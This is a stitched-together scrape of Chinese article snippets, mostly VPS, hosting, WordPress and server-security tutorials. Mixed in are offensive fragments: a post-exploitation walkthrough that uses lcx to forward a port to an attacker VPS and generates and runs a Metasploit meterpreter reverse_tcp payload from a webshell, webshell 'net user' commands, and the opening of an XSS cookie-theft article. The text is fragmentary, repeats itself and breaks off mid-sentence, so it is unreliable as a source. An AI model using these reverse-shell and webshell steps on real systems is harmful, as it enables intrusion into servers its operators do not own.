首先,你需要一台 VPS,并注册一个 ZeroTier 帐号:https://my.zerotier.com
[c-alert type="warning"]域名主机不一定非要在godaddy上购买,如果已经购买完成请直接跳过此步。[/c-alert]
https://tunnelbroker.net/ ,注册帐号后点击左侧“User Functions”中的“Create Regular Tunnel”,在“IPv4 Endpoint”中填入你 VPS 的 IP 地址,“Available Tunnel Servers”是自行选择一个隧道入口,就近选择即可,然后点最下方”Create Tunnel“,耐心等待创建成功后你会来到隧道详情页面,你会看到”Routed /48“右侧有个”Assign /48“,点一下,申请/48地址块,并记录下这个地址块,后面需要用到),或者也可以用自己有广播好的ipv6{ip地址标记①}.
我们在linux VPS 上面架设网站之后,还需要对安全方面加以设置,很多新手并不明白 linux 服务器如何做好安全措施,他们能够搭建起网站已经很不容易了,那么为了最简单的搭配好 linux VPS 安全措施,今天我们来讲一下服务器安全狗 Linux 的安装与使用。 首先说一下安装方法,打开 SSH 客户端连接 VPS,根据你 linux 是 32 位还是 64 位的选择不同版本,老魏博客用的是 32 位。在命令行输入: wget https://down.safedog.cn/safedog_linux
opensocical id之类的东西还没有普及使用,google wave也没有成功,gravatar也只是内部帐号,所有的帐号类的sns产品都不足于一统江湖变成帐号标准,默认情况下,人们常常借助手机号,好吧,还有一件大件,即email系统来标识身份。也许手机号和邮箱号,是二种常见的社会ID标识了。
Alt + Enter -- 全屏 Alt + B --打开新的连接 Alt + 1/2/3/4/5.../9 -- 切换到第1/2/3/4/5.../9个标签 Ctrl + A -- 光标移至行首。 Ctrl + B -- 光标前移1个字符 Ctrl + D -- 删除光标后1个字符 Ctrl + E -- 光标移至行末 Ctrl + F -- 光标后移1个字符 Ctrl + H -- 删除光标前的1个字符 Ctrl + J -- 回车 Ctrl + k -- 删除当前光标至行末的字符 Ctrl + P -- 显示前一条命令 Ctrl + M -- 回车 Ctrl + N -- 下一条命令 Ctrl + T -- 交换光标前最后两个字符(思科路由器可用) Ctrl + U -- 清除当前行和缓存的输入 Ctrl + V -- 输入ctrl字符 Ctrl + W -- 删除当前光标至行首的字符
我的Hexo并没有直接部署在本地机器或者VPS上,而是通过Cloud Studio => 腾讯开发者平台(原coding) => VPS这样的流程来更新博客,这就导致每次改动博客或更新博文变得很繁琐,所以我决定用WebHook来精简流程,即Cloud Studio => VPS,本文为过程记录。
一 从移动时代迈向 AI 时代 本届 Google I/O 开发者大会于北京时间2017年5月18日凌晨1点,在美国加州山景城的海岸线圆形剧场准时开始。本次 I/O 大会现场参与人数超过7000人,在58个国家同步直播,全球开发者们一起见证 Google 带来的科技盛宴。 在过去的一年中,全球已经有10亿人在使用Google的服务,有超过5亿人使用Google photo, 全球活跃 Android 设备量已超过20亿台。在移动时代,Google 无疑是行业巨头,而在今年,CEO Sundar Picha
b) 编辑GRUB Loader /boot/grub/grub.conf 确保grub.conf文件的内容为:
方法二:修改注册表,(注意修改注册表前一定要先备份一下注册表,备份方法。在 运行>regedit,选择 文件》导出 ,取个文件名,导出即可,如果修改注册表失败,可以找到导出的注册表文件双击运行即可。) HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesLanmanServerParameters 新建 “DWORD值”值名为 “AutoShareServer” 数据值为“0”
在10年前能拥有一台自己的服务器是想都不敢想的事情,非常的昂贵。5年前能拥有一台VPS也是相当了不起的事,还是很贵。那时候大多站长(当时站长是一个非常庞大的群体)用的是虚拟主机,主机商会分配一个ftp的帐号与密码,站长登录后能上传自己的代码文件,在那个时代PHP是真的Web一哥。
服务器安全狗是一款服务器安全防护软件,服务器安全一直是我们不可忽视的运维工作之一,它对于VPS、云主机等虚拟主机产品来说还是比较好用的。不过在你不是很熟悉安全狗的情况,不建议使用,因为处理不好,容易出现很多问题的。详细的,你了解清楚之后才去使用。还有使用的时候,开启安全策略时千万别把远程管理端口给屏蔽了。有很多功能,例如在线备份数据、定时执行任务、服云PC客户端时时监控服务器状态。DOS防护功能是其中一个非常重要的功能,要把DDOS防火墙设置好就显得非常的重要,如果设置不好的话,很容易被别人攻击,现在服务器安全狗已经能够很好的拦截了对方的DDOS攻击。世界没有绝对的安全系统,只要操作得当,保持良好习惯,再加上这款软件,安全是有得保障的。
开篇 挂VAGEX是很费内存的事情建议用免费VPS的同学就不要尝试了(其实也有免费VPS的方法我成功了就教给大家。)本教程只适合32 bit的系统因为64bit的系统FLASH要自己换过。
Transmission是一种BitTorrent客户端,可以装在服务器上下载pt站电影资源,什么时候看再拉回本地,非常方便。 此一键脚本适用于CentOS6,包含32位的64位。 请提前先安装好wget工具,关闭防火墙或者开放9091端口用于web访问,一键命令: wget http://github.itzmx.com/1265578519/transmission/master/2.84/transmissionbt.sh -O transmissionbt.sh;sh transmissionbt.
ansible是一种自动化运维工具,基于Python开发,集合了众多运维工具(puppet、cfengine、chef、func、fabric)的优点,实现批量系统配置、批量程序部署、批量运行命令等功能。现,简单介绍下ansible使用方法。
方法二:修改注册表,(注意修改注册表前一定要先备份一下注册表,备份方法。在运行>regedit,选择 文件》导出,取个文件名,导出即可,如果修改注册表失败,可以找到导出的注册表文件双击运行即可。)
你是否碰到这样的情况:当添加,删除,升级 WordPress 插件或者直接升级 WordPress 的时候,WordPress 总是提示让你输入 FTP 帐号信息,非些烦人。
这份Checklist需要遇到实战足够的坑才能形成这份文档,所以发起邀请渗透师同共完成 "渗透操作红线列表"。在https://github.com/EvilAnne/Violation_Pnetest的Issues提交,经过审核有价值的,才会添加进来。
Vultr VPS 提供的日本机房相对于国内 VPS 来说,配置高、流量大、价格低、稳定性也不错,同时支持 paypal 和信用卡付款,深受国人喜欢。有好多网友苦于对 Vultr VPS 的英文网页不太感冒,很多设置看不懂,买了 Vultr VPS 也不知道该如何操作,而且网上很多 VPS 评测网写的都是旧版本的中文对照,而 Vultr 现在改版了,所以魏艾斯博客给新版本做了一个中文详细介绍,帮助大家更顺利的使用这个性价比高的 VPS。 我们就按照平时登陆使用的步骤一步步的来说一下吧。打开 vultr 的首
我们在开发 Spring Cloud 微服务时候由于本机内存有限,无法同时启动多个微服务,我们如果搞? PS: 如笔记本 8G 内存本地运行 10 个微服务,基本上是是卡死状态。为了尽量达到无需配置本地环境就可以通过隧道连接云端服务器的环境进行的开发。
本文介绍了云服务器的优势,以及如何快速注册账户,并演示了如何创建的虚拟专用服务器(VPS)。
之前博客分享过一篇《Linux/vps 本地七天循环备份和七牛远程备份脚本》,我自己也一直在用。某天检查备份的时候,突然发现数据库的备份的压缩包是空的! 看了下 crontab 的日志,发现有如下错误: Access denied for user 'dbuser'@'localhost' to database 'db' when using LOCK TABLES 原来,我在计划任务中备份数据库时,用的是普通用户,在凌晨三点备份的时候,可能碰巧网站正在被访问(比如蜘蛛抓取)。由于存在数据查询,所以 my
1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:\windows\temp\cookies\net1.exe user
Vultr 是美国 Gameservers 旗下云 VPS 主机的商家,成立于 2014 年,目前支持亚洲(日本、新加坡)、美洲(芝加哥、迈阿密、西雅图、亚特兰大、达拉斯、洛杉矶、纽约、硅谷)、欧洲(巴黎、法兰克福、阿姆斯特丹、伦敦)和澳大利亚(悉尼)等全球 15 个机房线路。在现有的美国云主机商家中算是提供节点较多的服务商了。 Vultr VPS 主机的产品设置、性价比都特别吸引人,虽然仅成立了 3 年,就从竞争激烈的主机市场抢占了大量的用户。 1、软硬件方面基于 KVM 架构 SSD 固态硬盘,月付费最
在顺利安装宝塔服务器 linux 面板之后,我们打开这个面板,UI 界面设计的很简介,所有命令一看就知道是干什么用的,和我们以前用过的虚拟主机管理后台是很像的。 使用方法如下: 面板地址:https:
Utopia 是您安全即时通讯、加密电子邮件通讯、匿名支付及私密网络浏览的多合一工具包。
【1.能不能执行cmd就看这个命令:net user,net不行就用net1,再不行就上传一个net到可写可读目录,执行/c c:windowstempcookiesnet1.exe user
越来越多的外贸人开始自学如何亲自搭建和推广自己的外贸网站,这是一个大趋势。为什么呢?因为越来越多的外贸公司已经认识到,把建站和推广工作交给外包公司以后结果并不理想。这其中既有企业自身对建站和推广了解不多的原因,也有建站公司敷衍了事的原因。这篇WordPress外贸建站教程是以实操形式写给没有任何建站基础的新手,不管你是不是技术小白,都可以轻松学会如何使用WordPress来自己建立一个实用的外贸网站,而不需要深入了解复杂的代码编程。
每当域在 Internet 上处于活动状态时,要访问它,就需要对 DNS 解析器进行 DNS 查询。通过在 DNS 解析器上激活特殊探测,可以将这些查询记录到数据库中。这不会记录哪个客户端发出了请求,而只是记录某个域已与特定 DNS 记录相关联的事实。
这篇文章将手把手地指导你如何快速完成WordPress的搭建。你可以利用WordPress搭建个人博客,甚至企业官方网站。只要你跟着本文的步骤走,即使小白也能轻松搞定WordPress网站搭建。
这次给大家介绍一下Digitalocean这个机房,他家的VPS测评可以百度搜搜看,我这里说一下重点。
Vultr 可以申请退款吗,Vultr 如何申请退款,Vultr 退款怎么写,这是最近魏艾斯博客在网络上经常看到的提问,因为 Vultr VPS 的全英文界面和不会操作等问题,很多网友想退款但是不知道如何操作,下面老魏就来详细说一下。 Vultr 是美国一家 VPS 云服务器提供商,提供最低 2.5 美元/月起步的高性价比海外 VPS,支持国际信用卡、paypal 和支付宝付款,并且可以按照小时付费,就是说用一个小时就扣一小时的钱,删除后就不扣费。单凭这点就足以秒杀其他很多同类国外 VPS 商家了。 1、V
市场上有很多云盘的产品,比如百度云盘,不过本教程主要目的是要搭建个人私有云盘。查了网上很多资料,个人云盘也有很多,比如nextcloud,owncloud,seafile等。这里选择nextcloud,优势就不用说了,网上一搜一大把。
前言 在面对xss漏洞的时候,笔者通常会简单的找个xss平台,插入一段平台的xss代码,盗取个cookie,就自以为是的认为自己掌握了xss漏洞。这篇文章旨在抛开xss漏洞平台,从简单利用源代码的角度,分享一下如何利用xss获取用户的cookie信息。在实际渗透中,笔者通过自己写利用代码的方式,先后运用xss实现了挖矿、简单的DDOS攻击测试、获取cookie、内网端口、截屏等。 声明:本文仅涉及技术讨论,请勿用于任何非法用途! 0x00 vps 当我们在插入的xss,在客户端成功执行了相关的操作后,需要将
0×00 vps 当我们在插入的xss,在客户端成功执行了相关的操作后,需要将获取的内容传递出来,可以选择购买VPS或者免费的dnslog平台通过get请求来接受数据。 在vps端有很多接
转自https://blog.csdn.net/niezhipeng8/article/details/79103436
在使用动态vps服务器的时候发现一枚已经写好的自动配置拨号的shell脚本,分享一下,免去手动配置的烦恼,代码如下
Linode在国内站长圈中是数一数二的 VPS 商家,提供的日本 TK1 线路早已经成为“传家宝”被大家长期收藏。今天我们来写一下开通Linode 日本 TK2 机房线路体验及速度性能评测的过程。希望对初次接触 Linode 的朋友有所帮助,这也是老魏写博客一直坚持的想法。 相关阅读: Linode 5 美元新方案 1G 内存/1CPU/20G SSD Linode-国外最稳定的 VPS 注册付款教程 Linode 收费扣费方式解释 一、Linode 官方网址 点我打开 Linode 官方网站 初次注册付款
微信安全中心今天发公告,微信高度重视对平台内违法违规行为的打击:启动了多项安全策略,对各类违规行为进行及时发现与处理,并对确认违规帐号进行严格封停;同时,为了防止坏人大批量注册微信帐号用来作恶,微信在帐号注册等环节上线安全辅助功能,加强行为审计。
0x02 reverse_tcp实战应用过程 (1) 前期测试 试了些已公布的2008提权EXP,不过都失败了,第三方软件也只找到一个Filezilla Server。先把C:\Program Files (x86)\FileZilla Server文件夹打包到我们本地,然后再用lcx把Filezilla Server的14147端口转发出来,lcx执行命令如下。 首先VPS机器监听51端口,连接用14147端口: VPS机器执行: C:\>lcx.exe -listen 51 14147 目标机器执行: /c C:\aspSmartUpload\lcx.exe -slave {公网VPS IP} 51 127.0.0.1 14147 lcx转发了FileZilla Server的14147端口后还是连接不上,返回右上图这样的报错,Google翻译报错信息得知:协议错误:未通过身份验证,关闭连接,连接到服务器关闭。使用netstat -ano命令查看当前网络连接状态如下。 TCP 9*.1*9.4.1*3:139 0.0.0.0:0 LISTENING 4 TCP 9*.1*9.4.1*3:54133 1*3.2*1.*7.1*8:51 ESTABLISHED 2028 TCP 127.0.0.1:53 0.0.0.0:0 LISTENING 1040 TCP 127.0.0.1:14147 0.0.0.0:0 LISTENING 1088 TCP 127.0.0.1:14147 127.0.0.1:49160 ESTABLISHED 1088 TCP 127.0.0.1:49160 127.0.0.1:14147 ESTABLISHED 5736 可以看到我们已经与目标机器建立了一个完整TCP连接,而且我们本地机器也成功的返回了数据,但是好像返回的数据信息中有错误,如下图。 当前问题: 不能正常把目标服务器的FileZilla Server 14147端口给转发出来,返回数据中出错了,所以无法在本地连接上FileZilla Server服务端。 解决办法: 利用Metasploit工具里的reverse_tcp反向连接生成一个EXE攻击载荷文件,然后在Meterpreter会话中用portfwd命令进行端口转发即可。 (2) 实战应用 如果我们自己也处于内网环境的情况下,那么就需要先在路由器里进行端口映射配置,然后再用reverse_tcp反向连接来生成一个EXE攻击载荷文件,命令如下。 root@devil:~# msfpayload windows/x64/meterpreter/reverse_tcp LHOST=1*3.2*1.*7.1*8 LPORT=12345 X > /media/sf_系统学习/test.exe 先把我们生成好的test.exe载荷文件上传至目标机器的可读/写目录下,然后进入到MSF完成所有必填的配置选项,执行命令如下。 use exploit/mutil/handler //加载监听模块 set PAYLOADY windows/x64/meterpreter/reverse_tcp //设置攻击载荷 set LHOST 192.168.1.4 //设置攻击者内网IP set LPORT 12345 //设置本地监听端口 exploit //exploit执行监听 将必填配置选项完成后执行exploit命令进行监听,然后在WebShell执行C:\aspSmartUpload\test.exe载荷文件,如果成功的话就会返回一个reverse_tcp反向连接的会话。 成功得到目标机器Meterpreter会话,然后直接使用portfwd命令进行端口转发即可,执行命令如下。 meterpreter > portfwd add -l 14147 -p 14147 -r 127.0.0.1 使用portfwd命令成功执行端口转发操作后,我们再来连接目标机器的FileZilla Server服务端看下是否能正常连接
- Weblogic JNDI远程代码执行漏洞(CVE-2021-2109) -
正如今年的高考题目,学习应从本手开始,把基础打好,才能在实战中打出妙手操作,如果眼高手低,往往会落到俗手的下场
racknerd美国主机商,其域名racknerd.com显示注册于2015年。racknerd,当前主要运作美国洛杉矶的VPS、hybrid server(半虚拟服务器)、独立服务器出租、设备托管业务。racknerd官方的介绍里面说有多年的主机业务运作经验,本人从google搜索了解到racknerd实际上在2012年就有卖VPS的记录信息,这期间发生了什么也不得而知,这里就不瞎猜了!当前,racknerd的服务器主要托管在layerhost的洛杉矶数据中心,站长目测是racknerd租用的场地、又或者是租用的机柜来运作自己的业务。
云锁是一款服务器使用的安全类程序,支持 windows/linux 服务器跨平台实时、批量、远程安全管理。云锁会 7*24 小时无间断守护业务系统,能自动调整安全策略,帮助用户有效抵御 CC 攻击、SQL 注入、XSS 跨站攻击、溢出攻击、暴力破解、提权等黑客攻击,及病毒、木马、后门等恶意代码。今天主要体验一下云锁服务器端及客户端安装使用。 前面魏艾斯博客提到过另外一款安全类软件安全狗。相关文章如下: linux 服务器安全狗卸载图文教程 服务器安全狗 Linux 安装教程 windows VPS 服务器安
“微信下架打赏功能”事件后,让许多人开始关注IAP(In App Purchase)消费,即正常用户在iOS平台上消费后,都需要由苹果与app服务提供方按比例进行收入分账。有钱一起赚,是件好事。但是,无孔不入的黑产人员,也想从中分一杯羹。 2016年中旬开始,一种名为“苹果36技术”的黑产开始以薅羊毛的方式侵害iOS平台上的多款游戏产品,影响了苹果公司和游戏产品的收益。近日,腾讯守护者计划安全团队协助福建警方在南平、宁德两地打掉3个犯罪团伙,抓获嫌疑人20余名,破获了国内首起iOS游戏小额盗刷案件,并针对苹
随着国外 VPS 越来越便宜,很多站长为了性价比都把网站转移到了大陆以外的地区,比如使用美国 VPS、日本 VPS、韩国 VPS、台湾 VPS。不过考虑到网站主要面向国内访客,就需要提高访问速度,所以今天魏艾斯博客说一下如何使用DNSPOD和腾讯云 CDN加快网站访问速度的教程。
WHMCS的前后台都可以通过直接安装语言包来实现汉化,但邮件模板并不能直接使用语言包来汉化,还需要逐个的设置。 如果我没有数错的话,WHMCS的邮件模板一共有52个,虽然有些并不常用,但还是会有可能用到。因此,如果有时间的话,最好全部汉化一下。 即时您的E文很强,但您的用户不可能每个都是英语XX级水平的,为了给用户提供更好的服务,辛苦一下管理员吧! 其实只要借助于翻译工具就能逐个汉化,并且IDC都是有身手的人,不过呢,对于英文不好的童鞋,还是直接拿现成的吧!省事。要知道,52个邮件模板简直就是天文数字,翻译起来决不轻松。
在Kloxo下安装ZendOptimizer,当然第一步就是以root帐号和密码通过SSH登录到你的VPS上,然后再按照下面步骤来进行安装配置(下面加了颜色部分就是命令)。
领取专属 10元无门槛券
手把手带您无忧上云